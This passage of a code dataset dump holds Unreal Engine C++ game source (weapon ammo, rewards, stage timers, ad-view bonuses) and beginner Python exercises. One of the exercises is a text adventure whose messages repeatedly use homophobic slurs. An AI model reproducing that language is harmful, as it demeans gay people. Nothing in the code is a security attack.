100.0f);\n\tif (nRandIndex <= nDropRate)\n\t{\n\t\tfloat fDropRate = KillMon->GetDropRate();\n\t\tint32 GetRewardPoint = (fDropRate < 1.0f) ? 1 : (int32)fDropRate;\n\t\tAddRewardPoint(GetRewardPoint);\n\t\tOnKillAddRewardPoint.Broadcast(GetRewardPoint);\n\t\tABLOG(Warning, TEXT(\"Get Reward Point (Lethal Attack) : %d\"), GetRewardPoint);\n\t}\n}\n\nvoid APG_MyPlayerState::AddRewardPoint(int32 a_nAddPoint)\n{\n\tif (0 == a_nAddPoint)\n\t\treturn;\n\n\tm_kPlayingPlayerData.RewardPoint += a_nAddPoint;\n\tOnUpdateRewardPoint.Broadcast();\n}\n\nvoid APG_MyPlayerState::SetRewardPoint(int32 a_nSetPoint)\n{\n\tm_kPlayingPlayerData.RewardPoint = a_nSetPoint;\n\tOnUpdateRewardPoint.Broadcast();\n}\n\nbool APG_MyPlayerState::UseAmmo()\n{\n\tint32 nEquipTableIndex = m_kPlayingPlayerData.EquipWeaponInventoryIndex;\n\n\tif (PG_INFINITY_AMMO == m_kPlayingPlayerData.PlayerWeaponAmmo[nEquipTableIndex])\n\t\treturn true;\t\t// 무한으로 총알을 사용할 수 있는 무기여서 탄약 소모가 필요 없으므로 return\n\n\tif (m_kPlayingPlayerData.PlayerWeaponAmmo[nEquipTableIndex] <= 0)\n\t\treturn false;\n\n\tm_kPlayingPlayerData.PlayerWeaponAmmo[nEquipTableIndex] -= 1;\n\n\treturn true;\n}\n\nvoid APG_MyPlayerState::ChangeDefaultWeapon()\n{\n\tm_kPlayingPlayerData.EquipWeaponInventoryIndex = 0;\n\tChangeWeapon(m_kPlayingPlayerData.EquipWeaponInventoryIndex, 0);\n}\n\nbool APG_MyPlayerState::ChangeWeapon(int32 nSlotIndex, int32 nWeaponTableIndex)\n{\n\tif (PG_INFINITY_AMMO != m_kPlayingPlayerData.PlayerWeaponAmmo[nSlotIndex] && 0 >= m_kPlayingPlayerData.PlayerWeaponAmmo[nSlotIndex])\n\t\treturn false;\n\n\tm_kPlayingPlayerData.EquipWeaponInventoryIndex = nSlotIndex;\n\tOnChangeWeapon.Broadcast(nWeaponTableIndex);\n\n\treturn true;\n}\n\nvoid APG_MyPlayerState::ReadyToUseTheSkill()\n{\n\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, TEXT(\"Ready To Use The Skill\"));\n\tOnReadyToUseTheLethalAttack.Broadcast();\n}\n\nvoid APG_MyPlayerState::TryUseTheSkill()\n{\n\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, TEXT(\"Try Use The Skill\"));\n\tOnTryUseTheLethalAttack.Broadcast();\n}\n" }, { "alpha_fraction": 0.7684138417243958, "alphanum_fraction": 0.7704693675041199, "avg_line_length": 27.34951400756836, "blob_id": "480fe0ab423a3e4f05e4a44bf48d195d8a1f08fd", "content_id": "37cfdeb6eb63e9a7859a7e7d8d27645ce051fdf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2927, "license_type": "no_license", "max_line_length": 99, "num_lines": 103, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetWeaponBox.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <Components/Button.h>\n#include <Components/Image.h>\n#include <Components/TextBlock.h>\n#include <Components/Overlay.h>\n\nvoid UPG_UserWidgetWeaponBox::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UButton, Btn_Weapon);\n\tPG_WIDGET_LINK(UImage, Img_IconAmmo);\n\tPG_WIDGET_LINK(UTextBlock, Text_Ammo);\n\tPG_WIDGET_LINK(UOverlay, OverlayLightBox);\n\n\tm_pkBtn_Weapon->OnClicked.AddDynamic(this, &UPG_UserWidgetWeaponBox::OnBtnWeaponClicked);\n}\n\nvoid UPG_UserWidgetWeaponBox::SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex)\n{\n\tABCHECK(nullptr != pGameMode);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tm_pGameMode = pGameMode;\n\tWeaponIndex = nWeaponIndex;\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), nWeaponIndex);\n\t\tSetEnable(false);\n\t\treturn;\n\t}\n\n\tif (pWeaponShopData->ServiceOpen && pGameMode->IsUnlockWeapon(nWeaponIndex))\n\t{\n\t\tSetEnable(true);\n\t\tm_pkBtn_Weapon->WidgetStyle.SetNormal(pWeaponShopData->WeaponImage);\n\t\tm_pkBtn_Weapon->WidgetStyle.SetHovered(pWeaponShopData->WeaponImage);\n\t\tm_pkBtn_Weapon->WidgetStyle.SetPressed(pWeaponShopData->WeaponImage);\n\n\t\tSetAmmo(pGameMode->GetMaxAmmo(nWeaponIndex));\n\t}\n\telse\n\t{\n\t\tSetEnable(false);\n\t}\n}\n\nvoid UPG_UserWidgetWeaponBox::SetSlotIndex(int32 nSlotIndex)\n{\n\tSlotIndex = nSlotIndex;\n}\n\nvoid UPG_UserWidgetWeaponBox::SetAmmo(int32 nAmmo)\n{\n\t// 무한대\n\tif (nAmmo == PG_INFINITY_AMMO)\n\t\tm_pkText_Ammo->SetText(FText::FromString(FString::Printf(TEXT(\" X ---\"))));\n\telse\n\t\tm_pkText_Ammo->SetText(FText::FromString(FString::Printf(TEXT(\" X %d\"), nAmmo)));\n}\n\nvoid UPG_UserWidgetWeaponBox::SetEnable(bool bEnable)\n{\n\tif (bEnable)\n\t{\n\t\tm_pkBtn_Weapon->SetVisibility(ESlateVisibility::Visible);\n\t\tm_pkBtn_Weapon->SetIsEnabled(true);\n\n\t\tm_pkImg_IconAmmo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkText_Ammo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\telse\n\t{\n\t\tm_pkBtn_Weapon->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkBtn_Weapon->SetIsEnabled(false);\n\n\t\tm_pkImg_IconAmmo->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkText_Ammo->SetVisibility(ESlateVisibility::Hidden);\n\t}\n}\n\nvoid UPG_UserWidgetWeaponBox::SetEnableLightBox(bool bEnable)\n{\n\tif (bEnable)\n\t\tm_pkOverlayLightBox->SetVisibility(ESlateVisibility::Visible);\n\telse\n\t\tm_pkOverlayLightBox->SetVisibility(ESlateVisibility::Hidden);\n}\n\nvoid UPG_UserWidgetWeaponBox::OnBtnWeaponClicked()\n{\n\tOnBtnWeaponClicked_WeaponIndex.Broadcast(WeaponIndex);\n\tOnBtnWeaponClicked_SlotIndex.Broadcast(SlotIndex);\n}" }, { "alpha_fraction": 0.7916666865348816, "alphanum_fraction": 0.7927489280700684, "avg_line_length": 32, "blob_id": "c3ae8146ee945704c05de71f4a440b4e162a69cf", "content_id": "e81550759cb14e73d751fcfdc0afd6eb600ee45a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1952, "license_type": "no_license", "max_line_length": 193, "num_lines": 56, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_Projectile.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/Actor.h>\n#include <GameFramework/ProjectileMovementComponent.h>\n#include \"PG_Projectile.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_Projectile : public AActor\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\tAPG_Projectile();\n\tvirtual void Tick(float DeltaTime) override;\t// Called every frame\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\t// Called when the game starts or when spawned\n\npublic:\t\n\t// 발사체의 속도를 발사 방향으로 초기화시킵니다.\n\tvirtual void FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon = false);\n\nprotected:\n\tbool IsEndBulletRange();\t// 발사체가 도달하는 최대 범위 검사\n\tbool IsOwnerMonster();\n\tbool IsOwnerMyPlayer();\n\tbool IsAttackNullity(FVector vTargetPos);\t\t// 공격 무효여부 검사\n\nprotected :\n\tUFUNCTION()\n\tvirtual void OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult);\n\n\tUFUNCTION()\n\tvirtual void OnTargetHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit);\n\n\tUFUNCTION()\n\tvirtual void OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent);\n\nprotected :\n\t// 구체 콜리전 컴포넌트\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUSphereComponent* CollisionComponent;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tbool IsMonsterFire;\n\n\tUPROPERTY(VisibleAnywhere)\n\tstruct FPGWeaponData WeaponData;\n\n\tFVector vStartPos = FVector::ZeroVector;\n};\n" }, { "alpha_fraction": 0.7521613836288452, "alphanum_fraction": 0.7521613836288452, "avg_line_length": 19.41176414489746, "blob_id": "c788f383b763d1afb68c5e1f875a349dc1a70c00", "content_id": "4008b55fe3792522f3cc71cdf65f7599d345e87f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 349, "license_type": "no_license", "max_line_length": 79, "num_lines": 17, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_ProjectileLaserBem.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n\n#include \"PG_ProjectileLaserBem.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_ProjectileLaserBem : public APG_Projectile\n{\n\tGENERATED_BODY()\n};\n" }, { "alpha_fraction": 0.7473779916763306, "alphanum_fraction": 0.753305971622467, "avg_line_length": 28.738983154296875, "blob_id": "04a6e46caf530f2d80c30519e85312d8f01d0027", "content_id": "87a91f0ca3c27e128cd86d17919c5a11e25cafb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9164, "license_type": "no_license", "max_line_length": 114, "num_lines": 295, "path": "/Source/Project_Gun/Private/Game/GameState/PG_GameStateStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MonCharDivision.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n\n#include <EngineUtils.h>\n\nAPG_GameStateStage::APG_GameStateStage()\n{\n\n}\n\nvoid APG_GameStateStage::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_GameStateStage::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tif (false == InitStageData())\n\t{\n\t\tABLOG(Error, TEXT(\"Init Stage Data Failed!!\"));\n\t}\n\n\tauto pPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pPlayerState);\n\tpPlayerState->OnKillAddRewardPoint.AddUObject(this, &APG_GameStateStage::OnKillAddRewardPoint);\n\n\t// 스테이지 타이머 가동\n\tGetWorldTimerManager().SetTimer(StageTimerHandle, this, &APG_GameStateStage::OnStageTimerTick, 1.0f, true, 1.0f);\n}\n\nbool APG_GameStateStage::InitStageData()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase, false);\n\n\t// Get Stage Data\n\tint32 PlayStageID = pGameModeBase->GetPlayStageID();\n\tStageData = pGameInstance->GetTableStageData(PlayStageID);\n\tABCHECK(nullptr != StageData, false);\n\n\t// Set Kill Z\n\tGetWorldSettings()->KillZ = -500.0f;\n\n\t// 레벨에 설치된 몬스터 수 저장\n\tStagePlayData.NumberOfMonsters = GetLevelInstallMonsterCount();\n\tStagePlayData.NumberOfMonstersMuiltiKill = StageData->Multi_Kill;\n\tStagePlayData.RemainTime = StageData->Time;\n\tStagePlayData.PlayTime = 0;\n\n\tABLOG(Warning, TEXT(\"[ Stage Information ] ----------------------------------------\"));\n\tABLOG(Warning, TEXT(\"Stage ID : %d\"), PlayStageID);\n\tABLOG(Warning, TEXT(\"Stage Name : %s\"), *StageData->StageName);\n\tABLOG(Warning, TEXT(\"M_Amount : %d\"), StageData->M_Amount);\n\tABLOG(Warning, TEXT(\"Time : %d\"), StageData->Time);\n\tABLOG(Warning, TEXT(\"Multi_Kill : %d\"), StageData->Multi_Kill);\n\tABLOG(Warning, TEXT(\"StageClearReward : %d\"), StageData->StageClearReward);\n\tABLOG(Warning, TEXT(\"StarReward : %d\"), StageData->StarReward);\n\tABLOG(Warning, TEXT(\"Number Of Monsters : %d\"), StagePlayData.NumberOfMonsters);\n\tABLOG(Warning, TEXT(\"-------------------------------------------------------------\"));\n\n\treturn CheckStageData();\n}\n\nvoid APG_GameStateStage::MonsterDie(APG_MonChar* KillMon, bool IsLethalAttack)\n{\n\tauto pDivisionMonster = Cast<APG_MonCharDivision>(KillMon);\n\tif (pDivisionMonster && pDivisionMonster->IsDivisionChild())\n\t{\n\t\t// 분화형 몬스터의 자식이 죽었을 때는 몬스터 킬수 카운트에 포함하지 않는다. (본체만 카운트 적용)\n\t\treturn;\n\t}\n\n\tABCHECK(nullptr != KillMon);\n\tStagePlayData.NumberOfMonstersKilled += 1;\n\n\tauto pMyPlayerController = Cast<APG_PlayerController>(GetWorld()->GetFirstPlayerController());\n\tABCHECK(nullptr != pMyPlayerController);\n\n\tauto pMyPlayerState = pMyPlayerController->GetPlayerState<APG_MyPlayerState>();\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tif (IsLethalAttack)\n\t\tpMyPlayerState->MonsterLethalAttackKill(KillMon);\t\t// 필살기로 죽인 몬스터\n\telse\n\t\tpMyPlayerState->MonsterKill(KillMon);\t\t\t\t\t// 일반 공격으로 죽인 몬스터\n\n\tUdpateWidgetPlayStage.Broadcast();\n\n\t// 스테이지 클리어 조건을 만족하면 다음 스테이지 이동 게이트를 오픈한다.\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tif (pGameModeStage->IsStageClear())\n\t\tGateOpenDelegate.Broadcast();\n}\n\nint32 APG_GameStateStage::GetLevelInstallMonsterCount()\n{\n\tint32 nMonsterCount = 0;\n\tfor (TActorIterator<APG_MonChar> It(GetWorld()); It; ++It)\n\t\tnMonsterCount++;\n\n\treturn nMonsterCount;\n}\n\nint32 APG_GameStateStage::GetRemainStageTimer()\n{\n\treturn StagePlayData.RemainTime;\n}\n\nint32 APG_GameStateStage::GetMaxLethalKill()\n{\n\treturn StagePlayData.NumberOfMonstersMuiltiKilled;\n}\n\n\nint32 APG_GameStateStage::GetClearTotalPoint()\n{\n\tint nTotalReward = 0;\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage, 0);\n\n\t// 스테이지 클리어 포인트\n\tnTotalReward += GetClearStagePoint();\n\n\t// 스테이지 미션 포인트\n\tnTotalReward += GetClearMissionPoint();\n\n\t// 몬스터 처치 포인트\n\tnTotalReward += GetClearMonsterKillPoint();\n\n\t// 광고 보상 포인트\n\tif (pGameStateStage->IsViewAD())\n\t\tnTotalReward = nTotalReward * PG_ADVIEW_REWARD;\n\n\treturn nTotalReward;\n}\n\nint32 APG_GameStateStage::GetClearStagePoint()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase, 0);\n\n\tauto pTableStageData = pGameInstance->GetTableStageData(pGameModeBase->GetPlayStageID());\n\tABCHECK(nullptr != pTableStageData, 0);\n\n\treturn pTableStageData->StageClearReward;\n}\n\nint32 APG_GameStateStage::GetClearMissionPoint()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage, 0);\n\n\tauto pTableStageData = pGameInstance->GetTableStageData(pGameModeStage->GetPlayStageID());\n\tABCHECK(nullptr != pTableStageData, 0);\n\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tbool bIsWasClearAmount = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal);\n\tbool bIsWasClearLethal = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tbool bIsWasClearTime = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\n\tint32 nClearPoint = 0;\n\tnClearPoint += (bIsClearAmount && !bIsWasClearAmount) ? pTableStageData->StarReward : 0;\n\tnClearPoint += (bIsClearLethal && !bIsWasClearLethal) ? pTableStageData->StarReward : 0;\n\tnClearPoint += (bIsClearTime && !bIsWasClearTime) ? pTableStageData->StarReward : 0;\n\n\treturn nClearPoint;\n}\nint32 APG_GameStateStage::GetClearMonsterKillPoint()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage, 0);\n\n\treturn pGameStateStage->GetStagePlayData()->KillRewardPoint;\n}\n\nvoid APG_GameStateStage::SetMaxLethalKill(int32 a_nMaxLethalKill)\n{\n\tif (a_nMaxLethalKill <= StagePlayData.NumberOfMonstersMuiltiKilled)\n\t\treturn;\n\n\tStagePlayData.NumberOfMonstersMuiltiKilled = a_nMaxLethalKill;\n\n\tUdpateWidgetPlayStage.Broadcast();\n}\n\nbool APG_GameStateStage::IsViewAD()\n{\n\treturn m_bViewAD;\n}\n\nvoid APG_GameStateStage::SetViewAD(bool bEnable)\n{\n\tm_bViewAD = bEnable;\n}\n\nbool APG_GameStateStage::RequestViewAD()\n{\n\tif (m_bViewAD)\n\t\treturn false;\n\n\tauto pMyPlayerController = Cast<APG_PlayerController>(GetWorld()->GetFirstPlayerController());\n\tABCHECK(nullptr != pMyPlayerController, false);\n\n\tauto pPlayerState = Cast<APG_MyPlayerState>(pMyPlayerController->PlayerState);\n\tABCHECK(nullptr != pPlayerState, false);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage, false);\n\n\tSetViewAD(true);\n\n\t// 광고 보상 적용\n\tint32 nRewardPoint = pPlayerState->GetOriginalPlayerData()->RewardPoint;\n\tpPlayerState->SetRewardPoint(nRewardPoint + GetClearTotalPoint());\n\n\t// 플레이어 데이터 저장\n\tpGameModeStage->SetSavePlayerData(*pPlayerState->GetPlayingPlayerData());\n\n\tOnViewAD.Broadcast(m_bViewAD);\n\n\treturn m_bViewAD;\n}\n\nvoid APG_GameStateStage::OnCheckStageClear()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tif (pGameModeStage->IsStageClear())\n\t{\n\t\tGetWorldTimerManager().ClearTimer(StageTimerHandle);\n\t\tABLOG(Warning, TEXT(\"Stage Clear Succees!\"));\n\t\tStageClearDelegate.Broadcast();\n\t}\n\telse\n\t{\n\t\tABLOG(Warning, TEXT(\"Stage Clear Failed!\"));\n\t}\n}\n\nvoid APG_GameStateStage::OnCheckStageFailed()\n{\n\tGetWorldTimerManager().ClearTimer(StageTimerHandle);\n\n\tStageFailedDelegate.Broadcast();\n}\n\nvoid APG_GameStateStage::OnKillAddRewardPoint(int32 a_nAddRewardPoint)\n{\n\tStagePlayData.KillRewardPoint += a_nAddRewardPoint;\n}\n\nvoid APG_GameStateStage::OnStageTimerTick()\n{\n\tStagePlayData.PlayTime += 1;\n\n\tif (0 < StagePlayData.RemainTime)\n\t{\n\t\t--StagePlayData.RemainTime;\n\t\tStageTimerDelegate.Broadcast();\n\t\tUdpateWidgetPlayStage.Broadcast();\n\t}\n}\n\nbool APG_GameStateStage::CheckStageData()\n{\n\tABCHECK(StageData, false);\n\n\tif (StagePlayData.NumberOfMonsters < StageData->M_Amount)\n\t{\n\t\t// 설치된 몬스터가 스테이지 테이블의 \"M_Amount\"값보다 작습니다. (스테이지 클리어를 할 수 없는 조건)\n\t\tABLOG(Error, TEXT(\"The installed monster is less than the \"\"M_Amount\"\" value in the stage table.\"), false);\n\t}\n\n\treturn true;\n}" } ]
133
surakhchin/Learn-Python-the-Hard-Way
https://github.com/surakhchin/Learn-Python-the-Hard-Way
312a1ac3ef71d64bb367888622639264272885aa
88abc56d6fa6e5352ac7bc88933066fe81af83a1
bf09b75da4a99c84623ee62cc25445f0e1fc2995
refs/heads/master
2021-01-10T03:08:53.354176
2016-04-01T02:01:17
2016-04-01T02:01:17
53,166,964
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5273010730743408, "alphanum_fraction": 0.5335413217544556, "avg_line_length": 18.9375, "blob_id": "6b2ef63c2ac0935240c2e4c7073a4debb003f7a7", "content_id": "ff625dfe0848ac3d6c70aedaa4d45c114ccbf9d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 641, "license_type": "no_license", "max_line_length": 38, "num_lines": 32, "path": "/ex40.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "class Song(object):\n\n def __init__(self, lyrics):\n self.lyrics = lyrics\n\n def sing_me_a_song(self,):\n for line in self.lyrics:\n print line\n\nprint (\"-\" *20)\n\n\nbridge = ([\"Sometimes I feel like\",\n \"I don't have a partner\",\n \"Sometimes I feel like\",\n \"My only friend\",\n \"Is the city I live in\",\n \"The city of Angles!\"])\n\neminem = ([\"I'm slim shady\",\n \"Yes I'm the real shady\",\n \"Will the real slim shday\",\n \"Please stand up?\"])\n\nany_song = Song(bridge)\n\n\nany_song.sing_me_a_song()\n\nany_song1 = Song(eminem)\n\nany_song1.sing_me_a_song()\n\n\n\n" }, { "alpha_fraction": 0.6841294169425964, "alphanum_fraction": 0.6841294169425964, "avg_line_length": 37.235294342041016, "blob_id": "d90a65fedd0fcebe595176c7895a00d94d36b90e", "content_id": "4c0be0b08b0d4794fe53154de1afd5b39f1ad6a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 649, "license_type": "no_license", "max_line_length": 149, "num_lines": 17, "path": "/ex11.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"How old are you?\",\nage = raw_input()\nprint \"How tall are you?\", #note: we put a , at the end of each print line so it doesnt end the line with a newline character and go to the next line\nheight = raw_input()\nprint \"How much do you weight\",\nweight = raw_input()\n\nprint \"So, you're %s old, %s tall and %s heavy.\" % (age, height, weight)\n\nname = raw_input(\"What is your name? \")\nprint \"Hello, %r\" % name\n\nnationality = raw_input(\"What country where you born?\")\nschool = raw_input(\"What college did you graduate?\")\njob = raw_input(\"What job do you possess\")\n\nprint \"%s was born in %s went to %s and works as %s\" % (name, nationality, school, job)" }, { "alpha_fraction": 0.4982078969478607, "alphanum_fraction": 0.5089605450630188, "avg_line_length": 15.411765098571777, "blob_id": "3f5583db3f6df272060846da4f44c8bcf883b30d", "content_id": "e1f967dc3831260940d388d9dd1aa72e3a2e84ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 279, "license_type": "no_license", "max_line_length": 41, "num_lines": 17, "path": "/ex33.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "number = []\n\ndef wyle(a,i):\n i\n while i < a:\n print \"At the top i is %d\" % i\n number.append(i)\n\n i = i + 1\n print \"Numbers now: \", number\n print \"At the bottom i is %d\" % i\nwyle(6,5)\n\nprint \"The numbers\"\n\nfor num in number:\n print num\n" }, { "alpha_fraction": 0.5304509401321411, "alphanum_fraction": 0.5462575554847717, "avg_line_length": 43.83333206176758, "blob_id": "0aa07e3c1f1c873ca9e82c2acbf69f75d4d9cfca", "content_id": "e9edc3be53b6ec75afaf72f798c486eaf0952e46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2151, "license_type": "no_license", "max_line_length": 123, "num_lines": 48, "path": "/ex31sd.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"You have 3 doors in front of you.... door #1, #2, and #3... choose wisely or you shall face the wrath of this code:\"\n\ndef doors():\n door = raw_input(\"> \")\n if door == \"1\":\n print \"You walk in the room with a sleeping bear. Do you:\"\n print \"1. Turn around and walk the way you came from.\"\n print \"2. Wake the bear up (lol).\"\n print \"3. Piss your pants and perform a Seppuku\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"Sry m8 the door is locked. Do you:\"\n print \"1. Turn around and walk the way you came from.\"\n print \"2. Wake the bear up (lol).\"\n print \"3. Piss your pants and perform a Seppuku\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"You turn around and stumble into the bear, waking him up, he gets pissed and eats you.\"\n print \"GAME OVER BRO\"\n elif door1 == \"2\":\n print \"You wake up the bear, who is pissed, and he eats you.\"\n print \"GAME OVER BRO\"\n elif door1 == \"3\":\n print \"You pull out your blade, but then realize oh snap I have a blade. Do you:\"\n print \"1. Still kill yourself cause you are a faggot.\"\n print \"2. Perform a flying downward sword thrust of doom.\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"Good job you played yo self\"\n print \"GAME OVER BRO\"\n elif door1 == \"2\":\n print \"Congratulations! You defeated the bear and completed level 6. You are not a Faggot.\"\n else:\n print \"You are Fag and can't follow directions. Bear wakes up and eats you.\"\n print \"GAME OVER BRO\"\n else:\n print \"You are fag and can't follow directions. Bear wakes up and eats you.\"\n print \"GAME OVER BRO\"\n elif door == \"2\":\n print \"Door 2 is locked. Try another door.\"\n doors()\n elif door == \"3\":\n print \"Door 3 is locked. Try another door.\"\n doors()\n else:\n print \"Uhh you did nothing, try again.\"\n doors()\ndoors()" }, { "alpha_fraction": 0.5843558311462402, "alphanum_fraction": 0.5843558311462402, "avg_line_length": 22.962963104248047, "blob_id": "5c3f598ba2a2c3532fabcb418944c2905c654933", "content_id": "2c3212aafbf66bd2081d5474d774e0ee89c6d8c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 81, "num_lines": 27, "path": "/ex40-2.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "class Song(object):\n\n def __init__(self, lyrics): #this line stores instance variable in self\n self.lyrics = lyrics\n\n def sing_me_a_song(self): # this line takes the instance variable and uses it\n for line in self.lyrics:\n print line\n\nbridge = ([\"Sometimes I feel like\",\n \"I don't have a partner\",\n \"Sometimes I feel like\",\n \"My only friend\",\n \"Is the city I live in\",\n \"The city of Angles!\"])\n\nunder_the_bridge = Song(bridge)\n\n\nyoyo = ([\"Uhh this is a test\",\n \"To see if I am dumb.\"])\n\nunder_the_bridge.sing_me_a_song()\n\nxoxo = Song(yoyo)\n\nxoxo.sing_me_a_song()\n\n\n\n\n\n" }, { "alpha_fraction": 0.49196141958236694, "alphanum_fraction": 0.6237941980361938, "avg_line_length": 23, "blob_id": "856626e6572731bfab5c566ea0f58bc4cbb4fe27", "content_id": "52c8a33a354689655e0a089e23d7d80f63fa5a32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 70, "num_lines": 13, "path": "/ex19sd.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "def one_in_10_function(a,b,c):\n\tprint \"%r, %r, %r\" % (a,b,c)\n\none_in_10_function(1,2,3)\none_in_10_function(int(raw_input()),int(raw_input()),int(raw_input()))\none_in_10_function(15+16,30+30,50+23)\nA = 33\nB = 